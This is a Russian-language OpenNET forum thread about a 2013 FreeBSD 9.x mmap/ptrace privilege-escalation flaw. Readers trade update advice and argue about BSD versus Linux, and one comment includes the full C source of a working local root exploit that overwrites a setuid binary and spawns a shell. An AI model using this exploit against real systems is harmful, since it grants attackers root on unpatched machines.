The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Опасная локальная уязвимость в реализации mmap из состава Fr..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от opennews (ok) on 18-Июн-13, 23:54 
Во всех выпусках FreeBSD 9.x выявлена (http://lists.freebsd.org/pipermail/freebsd-announce/2013-Jun...) уязвимость в реализации виртуальной памяти, при успешной эксплуатации позволяющая локальному злоумышленнику повысить свои привилегии в системе. Для эксплуатации уязвимости атакующий должен иметь возможность выполнения произвольного кода с пользовательскими привилегиями. Проблема может привести к неавторизированной модификации произвольного файла к которому атакующий имеет доступ на чтение, но в обычных условиях не имеет доступа на запись.


Ошибка связана с отсутствием должных проверок доступа при трассировке приложений. В частности, процесс осуществляющий трассировку (например, отладчик) может получить права доступа к областям памяти трассируемого процесса, к которым у самого трассируемого процесса нет доступа (например, используя mmap для доступного только на чтение файла, можно получить доступ на запись к связанным с данным файлом областям памяти). Всем пользователям FreeBSD 9.x рекомендуется как можно скорее произвести обновление системы до   9.1-RELEASE-p4 или 9.1-STABLE.

URL: http://lists.freebsd.org/pipermail/freebsd-announce/2013-Jun...
Новость: http://www.opennet.me/opennews/art.shtml?num=37206

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +8 +/
Сообщение от Inome email(ok) on 18-Июн-13, 23:54 
эх, хорошо всё-таки, что не побежал обновляться до 9 :)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –9 +/
Сообщение от iZEN (ok) on 19-Июн-13, 00:06 
Можно подумать, что это очень сложно.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

12. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +1 +/
Сообщение от Аноним (??) on 19-Июн-13, 01:54 
долго пересобирать, если нету ip-kvm то это IMPOSSIBRU!
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

14. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +1 +/
Сообщение от 80е on 19-Июн-13, 02:09 
>> если нету ip-kvm то это IMPOSSIBRU!

Если нету ip-kvm то НЕТУ И ЛОКАЛЬНЫХ ПОЛЬЗОВАТЕЛЕЙ ! :)  :) :)

Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

16. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от Аноним (??) on 19-Июн-13, 04:00 
Ну да, а демоны у вас под какими пользователями работают? Сразу под рутом, чтобы хацкерам даже мучаться с дырками не надо было? :)
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

20. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –1 +/
Сообщение от 80е on 19-Июн-13, 05:15 
Вы читаете то, что комментируете?
Я имею ввиду описание уязвимости.
Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

37. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от Аноним (??) on 19-Июн-13, 13:55 
> Я имею ввиду описание уязвимости.

Да, и там написано:

> Для эксплуатации уязвимости атакующий должен иметь возможность выполнения произвольного
> кода с пользовательскими привилегиями.

Для тех кто на бронепоезде (бсдшники, то-бишь), поясняю: локальный пользователь - только в том плане что это не ремотное поимение по сети, а "лишь" "локальным" кодом выполняемым на машине. А как именно залогинен пользователь, через KVM или там как демон какой-то - да пофигу скорее всего. А что, есть какая-то большая разница откуда трассировочные вызовы дергать? Очень сомнительно.

Хотя, если вам хочется публично лохануться, показав всему миру что вы дуб дубом и не понимаете что такое системные вызовы и как это работает - окей, nice try!

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

48. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –2 +/
Сообщение от 80е on 20-Июн-13, 05:30 
Вос-с-спидя...
От ты ты дурачок сельскохозяйственный...
Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

56. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от Аноним (??) on 20-Июн-13, 15:34 
Да, наверное рассаду у вас лучше будет получаться выращивать. Самокритика засчитана.
Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

29. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +2 +/
Сообщение от Andrey Mitrofanov on 19-Июн-13, 10:28 
> Если нету ip-kvm

Ты пропустил:

"", нет запущенных сетевых сервисов, нет ключа от серверной, нет <...я.тоже.чего-то.пропустил...>

> то НЕТУ И ЛОКАЛЬНЫХ ПОЛЬЗОВАТЕЛЕЙ ! :)  :)  :)

Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

38. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от Аноним (??) on 19-Июн-13, 13:56 
И главное - питание к серваку не подключать!
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

49. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –1 +/
Сообщение от 80е on 20-Июн-13, 06:34 
запущенный сетевой сервис — системный процесс, а не «локальный пользователь»?
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

57. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от Аноним (??) on 20-Июн-13, 15:35 
> запущенный сетевой сервис — системный процесс, а не «локальный пользователь»?

И чем он отличается в плане дергания сисколов от процессов "локального пользователя" к которому вы прикопались?

Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

4. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –2 +/
Сообщение от IMHO on 19-Июн-13, 00:07 
хорошо что ее нашли и исправили, а там уже как хочешь так и обновляйся или нет, уязвимость то локальная
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

28. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от SubGun (ok) on 19-Июн-13, 10:24 
Но может быть реализована через другую уязвимость.
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

30. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +1 +/
Сообщение от Нанобот on 19-Июн-13, 10:48 
было б странно, если б нашли и не исправили
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

39. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от Аноним (??) on 19-Июн-13, 13:57 
> и обновляйся или нет, уязвимость то локальная

Ага, только это заканчивается тем что через вебню сначала хаксор просто вламывается и получает права пользователя. Потом апгрейдит их через что-то такое до рута. А потом ищи его свищи, когда там руткит половину сисколов переколбасил...

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

50. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –1 +/
Сообщение от друг iZEN on 20-Июн-13, 09:33 
да уж блиинннннн - ужас!!!! МОЖНО ПОДУМАТЬ ВАС АТАКУЮТ КАЖДЫЙ ДЕНЬ!, СМЕХ ДА И ТОЛЬКО
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

51. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +2 +/
Сообщение от Клыкастый (ok) on 20-Июн-13, 10:28 
Думать что тебя не атакуют каждый день - это раздолбайство. Атакуют. Каждый день.
Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

53. "Опасная локальная уязвимость в реализации mmap из..."  +1 +/
Сообщение от arisu (ok) on 20-Июн-13, 11:44 
> да уж блиинннннн - ужас!!!! МОЖНО ПОДУМАТЬ ВАС АТАКУЮТ КАЖДЫЙ ДЕНЬ!, СМЕХ
> ДА И ТОЛЬКО

если бы у тебя стояли хоть какие-то сервера на бсд и ты умел читать логи (я понимаю, что это два совершенно невероятных предположения), то ты узнал бы много интересного.

Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

58. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +1 +/
Сообщение от Аноним (??) on 20-Июн-13, 15:36 
> МОЖНО ПОДУМАТЬ ВАС АТАКУЮТ КАЖДЫЙ ДЕНЬ!

Если бы у тебя был сервер вывешенный в интернет и ты умел читать логи, ты бы узнал очень много интересного на этот счет.

Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

2. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от IMHO on 19-Июн-13, 00:06 
> Всем пользователям FreeBSD 9.x рекомендуется как можно скорее произвести обновление системы до 9.1-RELEASE-p4 или 9.1-STABLE.

спасибо, так и сделаю

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

5. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от FSA email(ok) on 19-Июн-13, 00:14 
Точно, пока ночь, надо машинку перезагрузить.
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

15. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –2 +/
Сообщение от 80е on 19-Июн-13, 03:14 
И где взять?

../release/9.1.0/ и ../releng/9.1/
и там, и там — МУСОР.

Как это уже было при переносе портов с CVS на SVN.
Ща та же красота в BASE :)
В SVN — мусор, в CVS — ТОЖЕ МУСОР :)

Получить -p4 низзя :)

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

21. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +1 +/
Сообщение от kshetragia (ok) on 19-Июн-13, 05:56 
freebsd-update? не?
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

34. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от 80е on 19-Июн-13, 13:20 
>> freebsd-update? не?

да, но это НЕ ПОПС.

Хотелось бы сдуть древо /usr/src

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

40. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от Аноним (??) on 19-Июн-13, 13:58 
> Хотелось бы сдуть древо /usr/src

А что, rm у вас сломался? :)

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

26. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от тигар (ok) on 19-Июн-13, 10:01 
releng/9.1
там не мусор, там код, если чо. и да, -p4. я проверил

r251903 | des | 2013-06-18 10:05:51 +0300 (вт, 18 июн 2013) | 9 lines
Changed paths:
   M /releng/9.1/UPDATING
   M /releng/9.1/sys/conf/newvers.sh
   M /releng/9.1/sys/vm/vm_map.c

Fix a bug that allowed a tracing process (e.g. gdb) to write
to a memory-mapped file in the traced process's address space
even if neither the traced process nor the tracing process had
write access to that file.

Security:       CVE-2013-2171
Security:       FreeBSD-SA-13:06.mmap
Approved by:    so


p.s. а в base (head) запихали svn[lite] и вынесли cvs :)

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

35. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –3 +/
Сообщение от 80е on 19-Июн-13, 13:27 
> releng/9.1
> там не мусор, там код, если чо. и да, -p4. я проверил
> r251903 | des | 2013-06-18 10:05:51 +0300 (вт, 18 июн 2013) |
> 9 lines
> Changed paths:
>    M /releng/9.1/UPDATING
>    M /releng/9.1/sys/conf/newvers.sh
>    M /releng/9.1/sys/vm/vm_map.c

И вы знаете, — Я В КУРСЕ :) :) :)
Осталось НЕ РУЧКАМИ сдуть эти изменения в /usr/src

А в SVN — именно МУ СОР
Ибо ни команда
svn co svn://svn.freebsd.org/base/releng/9.1/ /usr/src
ни команда
svn co svn://svn.freebsd.org/base/release/9.1.0/ /usr/src

набузыпив по мильену строк в /usr/src/.svn, — НЕ обновляют вот этих три
>    M /releng/9.1/UPDATING
>    M /releng/9.1/sys/conf/newvers.sh
>    M /releng/9.1/sys/vm/vm_map.c

Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

36. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от тигар (ok) on 19-Июн-13, 13:35 
>> releng/9.1
>> там не мусор, там код, если чо. и да, -p4. я проверил
>> r251903 | des | 2013-06-18 10:05:51 +0300 (вт, 18 июн 2013) |
>> 9 lines
>> Changed paths:
>>    M /releng/9.1/UPDATING
>>    M /releng/9.1/sys/conf/newvers.sh
>>    M /releng/9.1/sys/vm/vm_map.c
> И вы знаете, — Я В КУРСЕ :) :) :)
> Осталось НЕ РУЧКАМИ сдуть эти изменения в /usr/src

ну, если вместо того, чтобы узнать о существовании update, ну и вообще научиться пользоваться vcs, тренировать пальцы набирая смайлики... то да, "мусор"
> А в SVN — именно МУ СОР
> Ибо ни команда
> svn co svn://svn.freebsd.org/base/releng/9.1/ /usr/src
> ни команда
> svn co svn://svn.freebsd.org/base/release/9.1.0/ /usr/src

особенно доставила вторая попытка "обновиться" до -p4 из release/9.1.0. что, на лыссяре нет хаутушек как работать с svn и это делает тебя грустной пандой ?


Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

18. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –7 +/
Сообщение от Аноним (??) on 19-Июн-13, 04:04 
> Ошибка связана с отсутствием должных проверок доступа при трассировке
> приложений. В частности, процесс осуществляющий трассировку (например,
> отладчик) может получить права доступа к областям памяти трассируемого
> процесса, к которым у самого трассируемого процесса нет доступа

Феерично, чо. А у "лyноходов" даже в бyбунте обычной - тот кто не рут просто не может трейсить процессы, ибо постоянный источник проблем.

Вот как-то так и получается что ламерская бyбунта - секурнее пальцатой фрибзды. Чудеса, да? :)

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

23. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +6 +/
Сообщение от Аноним (??) on 19-Июн-13, 06:23 
sysctl security.bsd.unprivileged_proc_debug=0 ы?
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

24. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от linux must __RIP__ on 19-Июн-13, 08:26 
нельзя же так срезать :) недавно как раз в linux была дыра которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через sysctl..
Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

27. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +1 +/
Сообщение от Andrey Mitrofanov on 19-Июн-13, 10:22 
> нельзя же так срезать :) недавно как раз в linux была дыра
> которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через
> sysctl..

Нудк, теперь она есть и в твоей уютненькой.

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

31. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от BayaN (ok) on 19-Июн-13, 11:42 
> Нудк, теперь она есть и в твоей уютненькой.

Портировали сволочи! И как всегда с опозданием.


Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

43. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +1 +/
Сообщение от Аноним (??) on 19-Июн-13, 14:04 
> Портировали сволочи! И как всегда с опозданием.

Вопрос то не в портировании а в дефолтах. Вот ты при установке системы всегда прописываешь это? Нет? Тогда хренли толку с этого sysclt, если 90% обормотов которые пользуют BSD узнали о его существовании из этого поста? :)

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

42. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +1 +/
Сообщение от Аноним (??) on 19-Июн-13, 14:01 
> нельзя же так срезать :) недавно как раз в linux была дыра
> которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через sysctl..

Дядь, если ты не рут и пытаешься ptrace() - тебя просто сразу же и заворачивают. Совсем. Как это обойти то можно? :)

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

41. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от Аноним (??) on 19-Июн-13, 14:00 
> sysctl security.bsd.unprivileged_proc_debug=0 ы?

Только у бyбунтоидов и прочих это по дефолту. А у вас - думаете, нагуалы, тигары и прочие изены дотумкают это сделать без посторонней подсказки? Давайте поспорим что у них это не прописано и дырка эталонно работает, а? :)

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

74. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –1 +/
Сообщение от тигар (ok) on 21-Июн-13, 17:14 
на что спорить будем?

O.T. Мишенька, ты снова заболел, нельзя так, Шигорин.

Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

32. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –1 +/
Сообщение от ALex_hha (ok) on 19-Июн-13, 12:08 
> нельзя же так срезать :) недавно как раз в linux была дыра которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через sysctl..

вообще то легко лечилась правкой sysctl ;)

# sysctl kernel.perf_event_paranoid=2

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

33. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от whaddup email on 19-Июн-13, 12:09 
Вообще-то не лечилось.
Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

44. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –1 +/
Сообщение от anonymous (??) on 19-Июн-13, 14:19 
ну и где сейчас фря и где линукс?
Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

45. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –1 +/
Сообщение от zombardeer on 20-Июн-13, 00:15 
на серверах. ну и лялих на дескттопах. немножко.
Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

46. "Опасная локальная уязвимость в реализации mmap из..."  +1 +/
Сообщение от arisu (ok) on 20-Июн-13, 00:18 
> на серверах.

на всех четырёх!

Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

47. "Опасная локальная уязвимость в реализации mmap из..."  +2 +/
Сообщение от Фтщтнь on 20-Июн-13, 01:45 
>> на серверах.
> на всех четырёх!

На 24х... Ну лично у меня. А у вас я не знаю как там. Собственно тонко подвожу вас к тому, что понимание происходящего в объективной реальности  ограничено исключительно вашими же представлениями о нем.

Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

52. "Опасная локальная уязвимость в реализации mmap из..."  +1 +/
Сообщение от arisu (ok) on 20-Июн-13, 11:03 
а я намекаю, что по сравнению с пингвинусом разница между четырьмя, двадцатью четырьмя, двухсот сорока четырьмя — неразличима.
Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

63. "Опасная локальная уязвимость в реализации mmap из..."  +/
Сообщение от andrew0snake on 20-Июн-13, 20:49 
> а я намекаю, что по сравнению с пингвинусом разница между четырьмя, двадцатью
> четырьмя, двухсот сорока четырьмя — неразличима.

"двумястами сорока четырьмя" так-то) И вообще люди, что делают выбор в пользу использования (именно использования) Фряхи на серверах наверняка не только мониторят известия о найденых уязвимостях, но и не имеют проблем с sysctl'ами.

Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

65. "Опасная локальная уязвимость в реализации mmap из..."  +1 +/
Сообщение от arisu (ok) on 20-Июн-13, 21:30 
> «двумястами сорока четырьмя» так-то)

да, виноват. с местными грамотеями уже и Ў скоро буду с тремя ошибками писать.

Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

66. "Опасная локальная уязвимость в реализации mmap из..."  +/
Сообщение от Аноним (??) on 20-Июн-13, 22:47 
ЎX - новое обозначение для User eXperience :)
Ответить | Правка | ^ к родителю #65 | Наверх | Cообщить модератору

59. "Опасная локальная уязвимость в реализации mmap из..."  +/
Сообщение от Аноним (??) on 20-Июн-13, 15:37 
> На 24х... Ну лично у меня.

Думаете, ваши 24 сервака делают погоду на фоне миллионов? А большие конторы уже более-менее усвоили что жрать кактус смысла мало, при наличии более съедобных и удобных альтернатив.

Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

61. "Опасная локальная уязвимость в реализации mmap из..."  +/
Сообщение от Фтщтнь on 20-Июн-13, 15:50 
Отучаемся говорить за всех.
Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

67. "Опасная локальная уязвимость в реализации mmap из..."  +/
Сообщение от Аноним (??) on 20-Июн-13, 23:02 
> Отучаемся говорить за всех.

А что - всех? За них статистика уже все сказала.

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

73. "Опасная локальная уязвимость в реализации mmap из..."  –1 +/
Сообщение от Фтщтнь on 21-Июн-13, 05:14 
>Миллионы мух не могут ошибаться

Простите, не удержался

Ответить | Правка | ^ к родителю #67 | Наверх | Cообщить модератору

75. "Опасная локальная уязвимость в реализации mmap из..."  +/
Сообщение от Led (ok) on 22-Июн-13, 21:01 
>>Миллионы мух не могут ошибаться
> Простите, не удержался

А теперь на то, что ты "не удержался", слетится "миллионы мух". Родители не учили, что общественном месте нужно "удерживаться"?

Ответить | Правка | ^ к родителю #73 | Наверх | Cообщить модератору

54. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от ALex_hha (ok) on 20-Июн-13, 12:21 
> Вообще-то не лечилось.

если руки кривые, то не лечилось ;)

Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

62. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от whaddup email on 20-Июн-13, 17:00 
У кого-то мозги кривые. Обход этой настройки требовал исправления всего 1 байта в исходном коде сплойта.
Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору

55. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от pavlinux (ok) on 20-Июн-13, 13:24 

/*
* FreeBSD 9.{0,1} mmap/ptrace exploit
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years ago... :)
*
*/

#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"

int
main(int ac, char **av) {
   int from_fd, to_fd, status;
   struct stat st;
   struct ptrace_io_desc piod;
   char *s, *d;
   pid_t pid;

   if (geteuid() == 0)  {
        setuid(0);
        execl(SH, SH, NULL);
        return 0;
   }

   printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");

   if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
        (to_fd = open(TG, O_RDONLY)) == -1)
                err(1, "open");
if (stat(av[0], &st) == -1)
        err(2, "stat");

   if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
        MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
                (d = mmap(NULL, (size_t)st.st_size, PROT_READ,
                        MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
                                err(3, "mmap");

   if ((pid = fork()) == -1)
        err(4, "fork");

   if (!pid) {
        if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
                err(5, "ptraceme");

        return 0;
        }

   if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
        err(6, "ptattach");

   if (wait(&status) == -1)
        err(7, "wait");

   piod.piod_op = PIOD_WRITE_D;
   piod.piod_offs = d;
   piod.piod_addr = s;
   piod.piod_len  = st.st_size;

   if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
        err(8, "ptio");

   execl(TG, TG, NULL);

   return 0;
}


Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

60. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +2 +/
Сообщение от Аноним (??) on 20-Июн-13, 15:38 
>  * Now you are 20 years old and your security is the same as 20 years ago... :)

Дожили, секурити фрибзды троллят даже в эксплойтах :)

Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

64. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –2 +/
Сообщение от andrew0snake on 20-Июн-13, 20:53 
>>  * Now you are 20 years old and your security is the same as 20 years ago... :)
> Дожили, секурити фрибзды троллят даже в эксплойтах :)

На то ж они и тролли, чтоб троллить, а не находить эти уязвимости. И тем более не устранять)

Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

68. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +1 +/
Сообщение от Аноним (??) on 20-Июн-13, 23:03 
> На то ж они и тролли, чтоб троллить, а не находить эти
> уязвимости. И тем более не устранять)

Для того чтобы констатировать что "жрачка-дрянь!" совершенно не обязательно иметь квалификацию шеф-повара.

Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

71. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –2 +/
Сообщение от тигар (ok) on 21-Июн-13, 00:11 
>> На то ж они и тролли, чтоб троллить, а не находить эти
>> уязвимости. И тем более не устранять)
> Для того чтобы констатировать что "жрачка-дрянь!" совершенно не обязательно иметь квалификацию
> шеф-повара.

привыкшим жрать исключительно говно^W^W^Wпользоваться только линаксом (убунту?) совсем не обязательно видеть что-то отличное от, чтобы орать "жрачка-дрянь!" да.

Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

70. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –1 +/
Сообщение от тигар (ok) on 21-Июн-13, 00:09 
типичный луноход детектед. копирайты вырезаны, оригинальный линк не приведен. сделаю это за тебя, не благодари:
http://seclists.org/fulldisclosure/2013/Jun/161
Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

72. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  –1 +/
Сообщение от тигар (ok) on 21-Июн-13, 00:14 
и да, псто откуда ты с3.14здил эксплоит (а чо свой копирайт не поставил-то?;)) от 19го, а закрыли дыру 18го.
Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

76. "Опасная локальная уязвимость в реализации mmap из состава Fr..."  +/
Сообщение от StainlessRat (??) on 25-Июн-13, 21:25 
Всегда говорил: FreeBSD - Серверная платформа. Мастдай, и прочая хня - от лУКАВОГО. А локальная уязвимость... Так нех... пускать на сервер юзверей :)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

77. "Опасная локальная"  +/
Сообщение от Andrey Mitrofanov on 25-Июн-13, 21:50 
> Всегда говорил: FreeBSD
>Так нех... пускать на сервер юзверей :)

И IP соединеия снаружи. И соединеия *наружу*. И электричество из _сети_. </fbsd security>

Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру